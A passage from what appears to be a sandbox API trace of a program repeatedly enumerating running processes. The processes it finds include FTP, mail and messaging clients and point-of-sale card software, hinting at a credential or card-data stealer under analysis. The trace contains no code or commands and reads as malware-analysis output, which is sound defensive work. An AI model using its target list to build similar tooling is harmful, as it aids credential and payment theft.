th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0260.916] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.918] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0260.920] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0260.922] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0260.924] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0260.926] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0260.928] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0260.930] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0260.932] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0260.960] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0260.962] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0260.964] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0260.967] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0260.969] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0260.971] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0260.973] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0260.975] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0260.977] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0260.979] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0260.981] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0260.983] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0260.985] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0260.987] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0260.989] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0260.991] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0260.993] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0260.995] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0261.022] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0261.024] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0261.026] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0261.028] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0261.031] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0261.033] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0261.036] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0261.038] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0261.041] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0261.044] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0261.046] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0261.049] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0261.051] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0261.054] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0261.056] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0261.106] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0261.109] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0261.111] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0261.114] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0261.116] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0261.118] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0261.121] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0261.123] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0261.125] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0261.128] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0261.130] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0261.132] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0261.135] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0261.148] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0261.151] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0261.188] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0261.190] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0261.192] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0261.194] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0261.197] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0261.199] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0261.219] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0261.222] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0261.224] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0261.226] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0261.229] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0261.231] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0261.233] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0261.236] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0261.238] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0261.240] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0261.242] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0261.244] CloseHandle (hObject=0x758) returned 1 [0261.244] Sleep (dwMilliseconds=0x64) [0261.390] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0261.400] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.401] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0261.403] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0261.405] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.406] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0261.408] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.410] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0261.412] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0261.413] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, 